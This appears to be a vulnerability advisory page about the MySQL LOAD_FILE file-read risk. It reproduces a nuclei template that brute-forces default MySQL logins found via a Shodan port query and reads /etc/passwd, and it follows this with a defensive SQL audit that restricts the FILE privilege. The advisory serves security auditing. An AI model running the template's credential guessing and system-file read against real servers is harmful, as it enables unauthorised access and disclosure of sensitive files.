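MySQL LOAD_FILE Vulnerability

Vulnerability Information

Vulnerability name: MySQL LOAD_FILE Vulnerability

Vulnerability type: File read

Severity: High

Description: MySQL is a widely used open-source relational database management system that supports multiple users and multiple threads and is commonly used as the back-end data store for web applications. LOAD_FILE is a built-in MySQL function designed to read the contents of a file on the server and return them as a string. Used carelessly, however, the function can introduce security risk. This vulnerability is of the file-read type: its technical root cause is that use of LOAD_FILE is not properly restricted and its input is not validated, so an attacker can construct specific SQL queries to read sensitive files on the server, such as /etc/passwd. The vulnerability can lead to disclosure of sensitive information, which may in turn be used in further attacks. An attacker needs valid database credentials to exploit it, but may get past this restriction by brute forcing or by exploiting weak passwords. Exploitation can be automated, which increases the potential danger.

Vendor: Oracle

Product: MySQL

Search syntax: port:3306

Source: https://github.com/projectdiscovery/nuclei-templates/blob/804d1df949d5fbbfdee11564a2df65b6836a8d60/javascript%2Faudit%2Fmysql%2Fmysql-load-file.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC Details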


id: mysql-load-file
info:
  name: MySQL LOAD_FILE - Enable
  author: pussycat0x
  severity: high
  description: |
    The LOAD_FILE function in MySQL is potentially dangerous if not used carefully, as it can pose security risks. The function is designed to read the contents of a file on the server and return the file contents as a string. However, it can be exploited if not properly restricted or sanitized, leading to security vulnerabilities.
  reference:
    - https://nmap.org/nsedoc/scripts/mysql-databases.html
  metadata:
    verified: true
    max-request: 16
    shodan-query: "port:3306"
  tags: js,mysql,network,audit

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      let m = require('nuclei/mysql');
      let c = m.MySQLClient();
      let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
      Export(response);

    args:
      Host: "{{Host}}"
      Port: "3306"
      Query: SELECT LOAD_FILE('/etc/passwd')
      User: "{{usernames}}"
      Pass: "{{passwords}}"

    payloads:
      usernames:
        - root
        - admin
        - mysql
        - test
      passwords:
        - root
        - admin
        - mysql
        - test
    attack: clusterbomb

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - success == true

      - type: word
        words:
          - "root:x:"

    extractors:
      - type: json
        part: response
        json:
          - .Rows[]
# digest: 4a0a004730450221009ad416364c3679ae98d7f27001407c284157e5ee85cfcea19ed1d53e4119128d02205a3741b7625ca7a9c74d10f76c99007e382188b80f5d6c7cadcf28d583b727e6:922c64590222798bb761d5b6d8e72950
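
The template above only matches when an account has both a guessable password and the ability to call LOAD_FILE on an arbitrary path. The following server-side audit is an added example, not part of the original page or of the nuclei-templates project. It assumes MySQL 5.7 or 8.0 and an administrative session, and 'app_user'@'%' is a hypothetical account name.

```sql
-- Added example: audit and reduce LOAD_FILE exposure on a MySQL 5.7/8.0 server.
-- Run as an administrative account. 'app_user'@'%' is a hypothetical name.

-- 1. Where is the server allowed to read and write files?
--    ''         -> no restriction: LOAD_FILE can read any file mysqld can read
--    /some/dir  -> only files inside that directory
--    NULL       -> import/export operations, including LOAD_FILE, are disabled
SELECT @@GLOBAL.secure_file_priv AS secure_file_priv;

-- secure_file_priv is read-only at runtime. To change it, set it in the
-- option file and restart the server, for example:
--   [mysqld]
--   secure_file_priv = NULL

-- 2. Which accounts hold the global FILE privilege that LOAD_FILE requires?
SELECT GRANTEE, IS_GRANTABLE
FROM information_schema.USER_PRIVILEGES
WHERE PRIVILEGE_TYPE = 'FILE'
ORDER BY GRANTEE;

-- 3. Of those, which can connect from any host or have no stored credential?
--    Accounts using a socket-based plugin legitimately store no password,
--    so read empty_password together with the plugin column.
SELECT user, host, plugin,
       (authentication_string IS NULL OR authentication_string = '') AS empty_password
FROM mysql.user
WHERE File_priv = 'Y'
  AND (host IN ('%', '')
       OR authentication_string IS NULL
       OR authentication_string = '');

-- 4. Remove FILE from every account that does not need server-side file access.
REVOKE FILE ON *.* FROM 'app_user'@'%';

-- 5. Verify from a new session as that account. LOAD_FILE returns NULL when the
--    caller lacks FILE or the path is outside secure_file_priv, so this
--    should return 1.
SELECT LOAD_FILE('/etc/passwd') IS NULL AS load_file_blocked;
```

Steps 1 and 2 are read-only and safe to run on production; the accounts listed in the template's payloads (root, admin, mysql, test) are the first ones to check in the output of step 3.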


http://example.com/2025/07/27/github_2304026959/
Author: lianccc
Published: July 27, 2025